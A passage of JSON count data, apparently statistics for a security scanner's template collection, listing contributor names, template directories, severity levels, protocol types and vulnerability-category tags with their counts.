airane","count":1},{"name":"blckraven","count":1},{"name":"pdp","count":1},{"name":"remonsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"divya_mudgal","count":1},{"name":"evolutionsec","count":1},{"name":"nytr0gen","count":1},{"name":"retr0","count":1},{"name":"akash.c","count":1},{"name":"forgedhallpass","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sicksec","count":1},{"name":"rojanrijal","count":1},{"name":"revblock","count":1},{"name":"zandros0","count":1},{"name":"jeya seelan","count":1},{"name":"tim_koopmans","count":1},{"name":"defr0ggy","count":1},{"name":"_harleo","count":1},{"name":"push4d","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"vzamanillo","count":1},{"name":"ldionmarcil","count":1},{"name":"omarkurt","count":1},{"name":"whynotke","count":1},{"name":"c3l3si4n","count":1},{"name":"willd96","count":1},{"name":"clarkvoss","count":1},{"name":"smaranchand","count":1},{"name":"0xteles","count":1},{"name":"co0nan","count":1},{"name":"brabbit10","count":1},{"name":"un-fmunozs","count":1},{"name":"geraldino2","count":1},{"name":"schniggie","count":1},{"name":"yashgoti","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"b4uh0lz","count":1},{"name":"andirrahmani1","count":1},{"name":"gboddin","count":1},{"name":"ahmetpergamum","count":1},{"name":"becivells","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"shelld3v","count":1},{"name":"mesaglio","count":1},{"name":"th3.d1p4k","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"bjhulst","count":1},{"name":"_c0wb0y_","count":1},{"name":"qlkwej","count":1},{"name":"0h1in9e","count":1},{"name":"bad5ect0r","count":1},{"name":"alperenkesk","count":1},{"name":"notsoevilweasel","count":1},{"name":"chron0x","count":1},{"name":"cookiehanhoan","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"dawid-czarnecki","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"iampritam","count":1},{"name":"x6263","count":1},{"name":"kre80r","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"zhenwarx","count":1},{"name":"makyotox","count":1},{"name":"ohlinge","count":1},{"name":"andysvints","count":1},{"name":"ajaysenr","count":1},{"name":"noamrathaus","count":1},{"name":"akshansh","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"streetofhackerr007","count":1},{"name":"oscarintherocks","count":1},{"name":"micha3lb3n","count":1},{"name":"fopina","count":1},{"name":"b0rn2r00t","count":1},{"name":"droberson","count":1},{"name":"thevillagehacker","count":1},{"name":"j33n1k4","count":1},{"name":"raesene","count":1},{"name":"intx0x80","count":1},{"name":"bolli95","count":1},{"name":"luci","count":1},{"name":"mubassirpatel","count":1},{"name":"borna nematzadeh","count":1},{"name":"manuelbua","count":1},{"name":"ooooooo_q","count":1},{"name":"berkdusunur","count":1},{"name":"luskabol","count":1},{"name":"wabafet","count":1},{"name":"@dwisiswant0","count":1},{"name":"regala_","count":1},{"name":"alph4byt3","count":1},{"name":"deena","count":1},{"name":"thebinitghimire","count":1},{"name":"thezakman","count":1},{"name":"rotemreiss","count":1},{"name":"its0x08","count":1},{"name":"knassar702","count":1},{"name":"juicypotato1","count":1},{"name":"rodnt","count":1},{"name":"izn0u","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"flag007","count":1},{"name":"tirtha_mandal","count":1},{"name":"hanlaomo","count":1},{"name":"d0rkerdevil","count":1},{"name":"shreyapohekar","count":1},{"name":"exploitation","count":1},{"name":"philippdelteil","count":1},{"name":"affix","count":1},{"name":"absshax","count":1},{"name":"0xtavian","count":1},{"name":"alex","count":1},{"name":"b0yd","count":1},{"name":"fmunozs","count":1},{"name":"ahmed sherif","count":1},{"name":"_darrenmartyn","count":1},{"name":"yavolo","count":1},{"name":"mah3sec_","count":1}],"directory":[{"name":"cves","count":821},{"name":"vulnerabilities","count":316},{"name":"exposed-panels","count":255},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":137},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":58},{"name":"file","count":49},{"name":"workflows","count":37},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":733},{"name":"high","count":632},{"name":"medium","count":471},{"name":"critical","count":284},{"name":"low","count":155}],"types":[{"name":"http","count":2164},{"name":"file","count":49},{"name":"network","count":45},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":827},{"name":"lfi","count":337},{"name":"panel","count":267},{"name":"xss","count":258},{"name":"wordpress","count":249},{"name":"exposure","count":239},{"name":"rce","count":212},{"name":"tech","count":195},{"name":"wp-plugin","count":172},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":88},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"iot","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"redirect","count":37},{"name":"cve2016","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":28},{"name":"jira","count":28},{"name":"cve2015","count":28},{"name":"cisco","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"router","count":21},{"name":"misconfig","count":20},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"login","count":14},{"name":"struts","count":14},{"name":"weblogic","count":14},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"fuzz","count":14},{"name":"dns","count":13},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"deserialization","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"intrusive","count":10},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"nginx","count":8},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"ibm","count":8},{"name":"microsoft","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"coldfusion","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"netgear","count":7},{"name":"api","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"drupal","count":6},{"name":"nodejs","count":6},{"name":"docker","count":6},{"name":"lucee","count":6},{"name":"solr","count":6},{"name":"fileupload","count":6},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"circarlife","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"crlf","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"windows","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"symantec","count":4},{"name":"traversal","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"webserver","count":4},{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"git","count":4},{"name":"exchange","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"zabbix","count":4},{"name":"symfony","count":4},{"name":"amazon","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"hongdian","count":4},{"name":"firebase","count":4},{"name":"strapi","count":4},{"name":"resin","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"proxy","count":4},{"name":"grafana","count":4},{"name":"fatpipe","count":4},{"name":"npm","count":4},{"name":"magmi","count":4},{"name":"wso2","count":4},{"name":"slack","count":4},{"name":"samsung","count":4},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"vbulletin","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"targa","count":3},{"name":"ssh","count":3},{"name":"fpd","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"druid","count":3},{"name":"r-seenet","count":3},{"name":"cve2007","count":3},{"name":"fanruan","count":3},{"name":"backdoor","count":3},{"name":"telerik","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"zhiyuan","count":3},{"name":"mail","count":3},{"name":"azure","count":3},{"name":"search","count":3},{"name":"injection","count":3},{"name":"exposures","count":3},{"name":"bigip","count":3},{"name":"prometheus","count":3},{"name":"ofbiz","count":3},{"name":"jeesns","count":3},{"name":"httpd","count":3},{"name":"terramaster","count":3},{"name":"ebs","count":3},{"name":"caucho","count":3},{"name":"github","count":3},{"name":"cloud","count":3},{"name":"mongodb","count":3},{"name":"kibana","count":3},{"name":"nacos","count":3},{"name":"nosqli","count":3},{"name":"node","count":3},{"name":"hoteldruid","count":3},{"name":"itop","count":3},{"name":"jellyfin","count":3},{"name":"log","count":3},{"name":"linkerd","count":3},{"name":"opensis","count":3},{"name":"openssh","count":3},{"name":"kevinlab","count":3},{"name":"openam","count":3},{"name":"oa","count":3},{"name":"cves","count":3},{"name":"smtp","count":3},{"name":"tikiwiki","count":3},{"name":"lansweeper","count":3},{"name":"cacti","count":3},{"name":"paloalto","count":2},{"name":"ec2","count":2},{"name":"mailchimp","count":2},{"name":"huawei","count":2},{"name":"cve2005","count":2},{"name":"enumeration","count":2},{"name":"dos","count":2},{"name":"openfire","count":2},{"name":"nextcloud","count":2},{"name":"grav","count":2},{"name":"igs","count":2},{"name":"nextjs","count":2},{"name":"bucket","count":2},{"name":"couchdb","count":2},{"name":"maian","count":2},{"name":"qihang","count":2},{"name":"smb","count":2},{"name":"horde","count":2},{"name":"shellshock","count":2},{"name":"waf","count":2},{"name":"s3","count":2},{"name":"status","count":2},{"name":"geowebserver","count":2},{"name":"aviatrix","count":2},{"name":"hostheader-injection","count":2},{"name":"backups","count":2},{"name":"spark","count":2},{"name":"commax","count":2},{"name":"activemq","count":2},{"name":"linux","count":2},{"name":"liferay","count":2},{"name":"jsf","count":2},{"name":"jboss","count":2},{"name":"yapi","count":2},{"name":"ecoa","count":2},{"name":"lotus","count":2},{"name":"akkadian","count":2},{"name":"text","count":2},{"name":"seeyon","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"db","count":2},{"name":"justwriting","count":2},{"name":"adminer","count":2},{"name":"kentico","count":2},{"name":"bruteforce","count":2},{"name":"rockmongo","count":2},{"name":"ucmdb","count":2},{"name":"plesk","count":2},{"name":"places","count":2},{"name":"sonicwall","count":2},{"name":"sitecore","count":2},{"name":"wordfence","count":2},{"name":"prtg","count":2},{"name":"netis","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"prestashop","count":2},{"name":"upload","count":2},{"name":"mida","count":2},{"name":"chiyu","count":2},{"name":"frp","count":2},{"name":"payara","count":2},{"name":"keycloak","count":2},{"name":"harbor","count":2},{"name":"fortios","count":2},{"name":"icewarp","count":2},{"name":"emerge","count":2},{"name":"minio","count":2},{"name":"trixbox","count":2},{"name":"ilo","count":2},{"name":"vcenter","count":2},{"name":"heroku","count":2},{"name":"guacamole","count":2},{"name":"kong","count":2},{"name":"hpe","count":2},{"name":"natshell","count":2},{"name":"totemomail","count":2},{"name":"aruba","count":2},{"name":"ecology","count":2},{"name":"service","count":2},{"name":"yii","count":2},{"name":"akamai","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"nagios","count":2},{"name":"xxljob","count":2},{"name":"axis","count":2},{"name":"bitly","count":2},{"name":"mcafee","count":2},{"name":"netsweeper","count":2},{"name":"axis2","count":2},{"name":"sharepoint","count":2},{"name":"splunk","count":2},{"name":"vrealize","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"rancher","count":2},{"name":"leak","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"chyrp","count":2},{"name":"voipmonitor","count":2},{"name":"embed","count":2},{"name":"phpcollab","count":2},{"name":"electron","count":2},{"name":"bypass","count":2},{"name":"rstudio","count":2},{"name":"storage","count":2},{"name":"tidb","count":2},{"name":"odoo","count":2},{"name":"cache","count":2},{"name":"favicon","count":2},{"name":"sonarqube","count":2},{"name":"saltstack","count":2},{"name":"wuzhicms","count":2},{"name":"flir","count":2},{"name":"getsimple","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"showdoc","count":2},{"name":"hasura","count":2},{"name":"openvpn","count":2},{"name":"webcam","count":2},{"name":"middleware","count":2},{"name":"wmt","count":1},{"name":"route","count":1},{"name":"office365","count":1},{"name":"shoretel","count":1},{"name":"hiawatha","count":1},{"name":"blue-ocean","count":1},{"name":"openrestry","count":1},{"name":"fiori","count":1},{"name":"playable","count":1},{"name":"acme","count":1},{"name":"sangfor","count":1},{"name":"cockpit","count":1},{"name":"jitsi","count":1},{"name":"wazuh","count":1},{"name":"extractor","count":1},{"name":"node-red-dashboard","count":1},{"name":"graphql","count":1},{"name":"iceflow","count":1},{"name":"nsasg","count":1},{"name":"karel","count":1},{"name":"nedi","count":1},{"name":"mdb","count":1},{"name":"selea","count":1},{"name":"mariadb","count":1},{"name":"sidekiq","count":1},{"name":"redis","count":1},{"name":"messaging","count":1},{"name":"openemr","count":1},{"name":"cve202","count":1},{"name":"episerver","count":1},{"name":"aura","count":1},{"name":"netmask","count":1},{"name":"mongo","count":1},{"name":"adb","count":1},{"name":"starttls","count":1},{"name":"huijietong","count":1},{"name":"gilacms","count":1},{"name":"resourcespace","count":1},{"name":"razor","count":1},{"name":"adiscon","count":1},{"name":"wifisky","count":1},{"name":"feifeicms","count":1},{"name":"spotify","count":1},{"name":"yealink","count":1},{"name":"rdp","count":1},{"name":"jfrog","count":1},{"name":"oscommerce","count":1},{"name":"interlib","count":1},{"name":"landrayoa","count":1},{"name":"testrail","count":1},{"name":"ecom","count":1},{"name":"discord","count":1},{"name":"traefik","count":1},{"name":"circontrorl","count":1},{"name":"dompdf","count":1},{"name":"manager","count":1},{"name":"tamronos","count":1},{"name":"opentsdb","count":1},{"name":"meraki","count":1},{"name":"stripe","count":1},{"name":"plc","count":1},{"name":"trane","count":1},{"name":"weglot","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"centos","count":1},{"name":"tongda","count":1},{"name":"comodo","count":1},{"name":"gsoap","count":1},{"name":"ems","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"redmine","count":1},{"name":"concrete","count":1},{"name":"expose","count":1},{"name":"darkstat","count":1},{"name":"elascticsearch","count":1},{"name":"linkedin","count":1},{"name":"panos","count":1},{"name":"iptime","count":1},{"name":"hubspot","count":1},{"name":"deviantart","count":1},{"name":"bing","count":1},{"name":"dotnet","count":1},{"name":"klog","count":1},{"name":"circleci","count":1},{"name":"streetview","count":1},{"name":"visualstudio","count":1},{"name":"graphite","count":1},{"name":"woocommerce","count":1},{"name":"exacqvision","count":1},{"name":"find","count":1},{"name":"tika","count":1},{"name":"jenzabar","count":1},{"name":"details","count":1},{"name":"flink","count":1},{"name":"fuelcms","count":1},{"name":"travis","count":1},{"name":"bedita","count":1},{"name":"spf","count":1},{"name":"solarlog","count":1},{"name":"cve2006","count":1},{"name":"stem","count":1},{"name":"fcm","count":1},{"name":"minimouse","count":1},{"name":"phpunit","count":1},{"name":"square","count":1},{"name":"mirai","count":1},{"name":"ilo4","count":1},{"name":"openx","count":1},{"name":"cerebro","count":1},{"name":"emby","count":1},{"name":"smi","count":1},{"name":"azkaban","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"zte","count":1},{"name":"proftpd","count":1},{"name":"spidercontrol","count":1},{"name":"etouch","count":1},{"name":"xampp","count":1},{"name":"mkdocs","count":1},{"name":"ricoh","count":1},{"name":"listserv","count":1},{"name":"finereport","count":1},{"name":"tensorboard","count":1},{"name":"vscode","count":1},{"name":"shiro","count":1},{"name":"email","count":1},{"name":"diris","count":1},{"name":"zeroshell","count":1},{"name":"zarafa","count":1},{"name":"package","count":1},{"name":"alerta","count":1},{"name":"aspnuke","count":1},{"name":"artica","count":1},{"name":"default","count":1},{"name":"tjws","count":1},{"name":"rockethchat","count":1},{"name":"cse","count":1},{"name":"labtech","count":1},{"name":"netgenie","count":1},{"name":"kafdrop","count":1},{"name":"totaljs","count":1},{"name":" default-login","count":1},{"name":"csrf","count":1},{"name":"codemeter","count":1},{"name":"glowroot","count":1},{"name":"wiki","count":1},{"name":"qdpm","count":1},{"name":"commscope","count":1},{"name":"jnoj","count":1},{"name":"scs","count":1},{"name":"auth","count":1},{"name":"szhe","count":1},{"name":"plugin","count":1},{"name":"maccmsv10","count":1},{"name":"luftguitar","count":1},{"name":"lg-nas","count":1},{"name":"codeigniter","count":1},{"name":"triconsole","count":1},{"name":"sophos","count":1},{"name":"dotnetnuke","count":1},{"name":"sql","count":1},{"name":"mrtg","count":1},{"name":"soar","count":1},{"name":"yachtcontrol","count":1},{"name":"wondercms","count":1},{"name":"cves2001","count":1},{"name":"geolocation","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"erp-nc","count":1},{"name":"ambari","count":1},{"name":"krweb","count":1},{"name":"floc","count":1},{"name":"dvr","count":1},{"name":"directions","count":1},{"name":"dnssec","count":1},{"name":"keenetic","count":1},{"name":"plone","count":1},{"name":"ssltls","count":1},{"name":"weather","count":1},{"name":"hiboss","count":1},{"name":"jmx","count":1},{"name":"contentkeeper","count":1},{"name":"centreon","count":1},{"name":"ns","count":1},{"name":"panasonic","count":1},{"name":"calendarix","count":1},{"name":"crm","count":1},{"name":"optiLink","count":1},{"name":"esmtp","count":1},{"name":"zenario","count":1},{"name":"owasp","count":1},{"name":"geocode","count":1},{"name":"k8s","count":1},{"name":"moin","count":1},{"name":"graylog","count":1},{"name":"opm","count":1},{"name":"exponentcms","count":1},{"name":"domxss","count":1},{"name":"metinfo","count":1},{"name":"ulterius","count":1},{"name":"zcms","count":1},{"name":"pulsesecure","count":1},{"name":"panabit","count":1},{"name":"viewpoint","count":1},{"name":"cors","count":1},{"name":"rocketchat","count":1},{"name":"qvisdvr","count":1},{"name":"pagespeed","count":1},{"name":"visionhub","count":1},{"name":"timeclock","count":1},{"name":"grails","count":1},{"name":"lokalise","count":1},{"name":"roads","count":1},{"name":"timezone","count":1},{"name":"clusterengine","count":1},{"name":"phpwiki","count":1},{"name":"fortinet","count":1},{"name":"pivotaltracker","count":1},{"name":"metabase","count":1},{"name":"idemia","count":1},{"name":"place","count":1},{"name":"acontent","count":1},{"name":"twitter","count":1},{"name":"miscrsoft","count":1},{"name":"nuuo","count":1},{"name":"monitorr","count":1},{"name":"bingmaps","count":1},{"name":"smartblog","count":1},{"name":"javascript","count":1},{"name":"zm","count":1},{"name":"blind","count":1},{"name":"tcexam","count":1},{"name":"sureline","count":1},{"name":"gotmls","count":1},{"name":"buildkite","count":1},{"name":"limit","count":1},{"name":"distance","count":1},{"name":"doh","count":1},{"name":"netrc","count":1},{"name":"trilithic","count":1},{"name":"landray","count":1},{"name":"lotuscms","count":1},{"name":"hortonworks","count":1},{"name":"wooyun","count":1},{"name":"gateone","count":1},{"name":"shopxo","count":1},{"name":"seacms","count":1},{"name":"dbeaver","count":1},{"name":"pyramid","count":1},{"name":"sendgrid","count":1},{"name":"dvwa","count":1},{"name":"websvn","count":1},{"name":"iterable","count":1},{"name":"jaspersoft","count":1},{"name":"fortigate","count":1},{"name":"circontrol","count":1},{"name":"javamelody","count":1},{"name":"sourcebans","count":1},{"name":"arl","count":1},{"name":"beanstalk","count":1},{"name":"sage","count":1},{"name":"solman","count":1},{"name":"netdata","count":1},{"name":"shopware","count":1},{"name":"flexbe","count":1},{"name":"syslog","count":1},{"name":"cscart","count":1},{"name":"cofax","count":1},{"name":"bazarr","count":1},{"name":"redhat","count":1},{"name":"froxlor","count":1},{"name":"gurock","count":1},{"name":"apiman","count":1},{"name":"apos","count":1},{"name":"gridx","count":1},{"name":"thinkadmin","count":1},{"name":"okta","count":1},{"name":"moinmoin","count":1},{"name":"dotclear","count":1},{"name":"lighttpd","count":1},{"name":"elevation","count":1},{"name":"cloudinary","count":1},{"name":"yzmcms","count":1},{"name":"gitlist","count":1},{"name":"couchbase","count":1},{"name":"hadoop","count":1},{"name":"autocomplete","count":1},{"name":"ruckus","count":1},{"name":"jumpcloud","count":1},{"name":"tapestry","count":1},{"name":"rsyncd","count":1},{"name":"tinypng","count":1},{"name":"dropbox","count":1},{"name":"api-manager","count":1},{"name":"gitea","count":1},{"name":"terraform","count":1},{"name":"gstorage","count":1},{"name":"rabbitmq","count":1},{"name":"servicenow","count":1},{"name":"loganalyzer","count":1},{"name":"jquery","count":1},{"name":"influxdb","count":1},{"name":"swagger","count":1},{"name":"ssl","count":1},{"name":"webmin","count":1},{"name":"clockwatch","count":1},{"name":"drone","count":1},{"name":"clickhouse","count":1},{"name":"mautic","count":1},{"name":"memcached","count":1},{"name":"gunicorn","count":1},{"name":"sco","count":1},{"name":"beanshell","count":1},{"name":"fastapi","count":1},{"name":"phpshowtime","count":1},{"name":"alibaba","count":1},{"name":"bolt","count":1},{"name":"newrelic","count":1},{"name":"vsftpd","count":1},{"name":"asana","count":1},{"name":"instagram","count":1},{"name":"secmail","count":1},{"name":"lancom","count":1},{"name":"speed","count":1},{"name":"pacsone","count":1},{"name":"bigbluebutton","count":1},{"name":"raspap","count":1},{"name":"webftp","count":1},{"name":"myvuehelp","count":1},{"name":"svnserve","count":1},{"name":"sgp","count":1},{"name":"mysql","count":1},{"name":"magicflow","count":1},{"name":"rhymix","count":1},{"name":"csrfguard","count":1},{"name":"pihole","count":1},{"name":"embedthis","count":1},{"name":"springframework","count":1},{"name":"k8","count":1},{"name":"postmark","count":1},{"name":"glances","count":1},{"name":"announcekit","count":1},{"name":"anchorcms","count":1},{"name":"zmanda","count":1},{"name":"upnp","count":1},{"name":"csod","count":1},{"name":"mailgun","count":1},{"name":"myucms","count":1},{"name":"powercreator","count":1},{"name":"fortigates","count":1},{"name":"webui","count":1},{"name":"accela","count":1},{"name":"lutron","count":1},{"name":"appweb","count":1},{"name":"expn","count":1},{"name":"nuxeo","count":1},{"name":"oidc","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"fortiweb","count":1},{"name":"nomad","count":1},{"name":"photo","count":1},{"name":"locations","count":1},{"name":"pmb","count":1},{"name":"smartsense","count":1},{"name":"empirecms","count":1},{"name":"opensns","count":1},{"name":"pcoip","count":1},{"name":"achecker","count":1},{"name":"tracer","count":1},{"name":"actuator","count":1},{"name":"phpinfo","count":1},{"name":"ipstack","count":1},{"name":"sarg","count":1},{"name":"okiko","count":1},{"name":"tileserver","count":1},{"name":"nerdgraph","count":1},{"name":"eyelock","count":1},{"name":"sprintful","count":1},{"name":"xunchi","count":1},{"name":"turbocrm","count":1},{"name":"lanproxy","count":1},{"name":"qsan","count":1},{"name":"etherpad","count":1},{"name":"openerp","count":1},{"name":"opencast","count":1},{"name":"ueditor","count":1},{"name":"basic-auth","count":1},{"name":"discourse","count":1},{"name":"cobub","count":1},{"name":"twitter-server","count":1},{"name":"bash","count":1},{"name":"wamp","count":1},{"name":"maxsite","count":1},{"name":"pendo","count":1},{"name":"xiuno","count":1},{"name":"xdcms","count":1},{"name":"mpsec","count":1},{"name":"chinaunicom","count":1},{"name":"shopizer","count":1},{"name":"ognl","count":1},{"name":"uwsgi","count":1},{"name":"pagerduty","count":1},{"name":"owa","count":1},{"name":"chevereto","count":1},{"name":"nc2","count":1},{"name":"clink-office","count":1},{"name":"tectuus","count":1},{"name":"database","count":1},{"name":"bookstack","count":1},{"name":"mantisbt","count":1},{"name":"mapbox","count":1},{"name":"webmodule-ee","count":1},{"name":"spring","count":1},{"name":"scimono","count":1},{"name":"viewlinc","count":1},{"name":"simplecrm","count":1},{"name":"imap","count":1},{"name":"sar2html","count":1},{"name":"cgi","count":1},{"name":"alertmanager","count":1},{"name":"ewebs","count":1},{"name":"daybyday","count":1},{"name":"cocoon","count":1},{"name":"nexusdb","count":1},{"name":"postgres","count":1},{"name":"ruby","count":1},{"name":"olivetti","count":1},{"name":"oneblog","count":1},{"name":"novnc","count":1},{"name":"werkzeug","count":1},{"name":"kerbynet","count":1},{"name":"rubedo","count":1},{"name":"spectracom","count":1},{"name":"axiom","count":1},{"name":"phpfusion","count":1},{"name":"calendly","count":1},{"name":"tor","count":1},{"name":"geutebruck","count":1},{"name":"tugboat","count":1},{"name":"wavlink","count":1},{"name":"realteo","count":1},{"name":"phalcon","count":1},{"name":"bullwark","count":1},{"name":"b2evolution","count":1},{"name":"remkon","count":1},{"name":"perl","count":1},{"name":"livezilla","count":1},{"name":"kindeditor","count":1},{"name":"faraday","count":1},{"name":"nweb2fax","count":1},{"name":"octoprint","count":1},{"name":"avtech","count":1},{"name":"robomongo","count":1},{"name":"redcap","count":1},{"name":"craftcms","count":1},{"name":"74cms","count":1},{"name":"checkpoint","count":1},{"name":"wing-ftp","count":1},{"name":"zzzcms","count":1},{"name":"jsp","count":1},{"name":"cloudron","count":1},{"name":"tpshop","count":1},{"name":"xmlchart","count":1},{"name":"st","count":1},{"name":"htmli","count":1},{"name":"salesforce","count":1},{"name":"ghost","count":1},{"name":"placeos","count":1},{"name":"gloo","count":1},{"name":"visualtools","count":1},{"name":"ioncube","count":1},{"name":"setup","count":1},{"name":"saltapi","count":1},{"name":"webadmin","count":1},{"name":"synnefo","count":1},{"name":"vnc","count":1},{"name":"sentry","count":1},{"name":"gespage","count":1},{"name":"omi","count":1},{"name":"argussurveillance","count":1},{"name":"skywalking","count":1},{"name":"mobileiron","count":1},{"name":"shoppable","count":1},{"name":"clave","count":1},{"name":"wildfly","count":1},{"name":"zms","count":1},{"name":"woocomernce","count":1},{"name":"logontracer","count":1},{"name":"ntopng","count":1},{"name":"elasticsearch","count":1},{"name":"parentlink","count":1},{"name":"kyan","count":1},{"name":"mantis","count":1},{"name":"mongoshake","count":1},{"name":"ganglia","count":1},{"name":"buttercms","count":1},{"name":"sceditor","count":1},{"name":"rmi","count":1},{"name":"zyxel","count":1},{"name":"nette","count":1},{"name":"fortilogger","count":1},{"name":"eg","count":1},{"name":"matrix","count":1},{"name":"jeewms","count":1},{"name":"plastic","count":1},{"name":"cherokee","count":1},{"name":"motorola","count":1},{"name":"javafaces","count":1},{"name":"nimble","count":1},{"name":"nps","count":1},{"name":"processmaker","count":1},{"name":"gogs","count":1},{"name":"sqlite","count":1},{"name":"jenkin","count":1},{"name":"wakatime","count":1},{"name":"key","count":1},{"name":"redwood","count":1},{"name":"kubeflow","count":1},{"name":"duomicms","count":1},{"name":"majordomo2","count":1},{"name":"geddy","count":1},{"name":"spip","count":1},{"name":"socomec","count":1},{"name":"varnish","count":1},{"name":"nordex","count":1},{"name":"zend","count":1},{"name":"weiphp","count":1},{"name":"asus","count":1},{"name":"camunda","count":1},{"name":"pippoint","count":1},{"name":"frontpage","count":1},{"name":"loqate","count":1},{"name":"nifi","count":1},{"name":"pgadmin","count":1},{"name":"nearby","count":1},{"name":"biometrics","count":1},{"name":"openweather","count":1},{"name":"fastcgi","count":1},{"name":"phpfastcache","count":1},{"name":"subrion","count":1},{"name":"haproxy","count":1},{"name":"graph","count":1},{"name":"octobercms","count":1},{"name":"tenda","count":1},{"name":"whm","count":1},{"name":"sonarcloud","count":1},{"name":"tensorflow","count":1},{"name":"timesheet","count":1},{"name":"burp","count":1},{"name":"openstack","count":1},{"name":"portainer","count":1},{"name":"vidyo","count":1},{"name":"mod-proxy","count":1},{"name":"xvr","count":1},{"name":"acexy","count":1},{"name":"youtube","count":1},{"name":"expressjs","count":1},{"name":"goahead","count":1},{"name":"primetek","count":1},{"name":"vsphere","count":1},{"name":"servicedesk","count":1},{"name":"digitalocean","count":1},{"name":"eprints","count":1},{"name":"mediumish","count":1},{"name":"natemail","count":1},{"name":"rujjie","count":1},{"name":"addpac","count":1},{"name":"websphere","count":1},{"name":"linksys","count":1},{"name":"monitorix","count":1},{"name":"wavemaker","count":1},{"name":"h3c-imc","count":1},{"name":"eyou","count":1},{"name":"cloudflare","count":1},{"name":"opensmtpd","count":1},{"name":"postmessage","count":1},{"name":"circle","count":1},{"name":"clockwork","count":1},{"name":"elfinder","count":1},{"name":"xml","count":1},{"name":"rmc","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":273},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","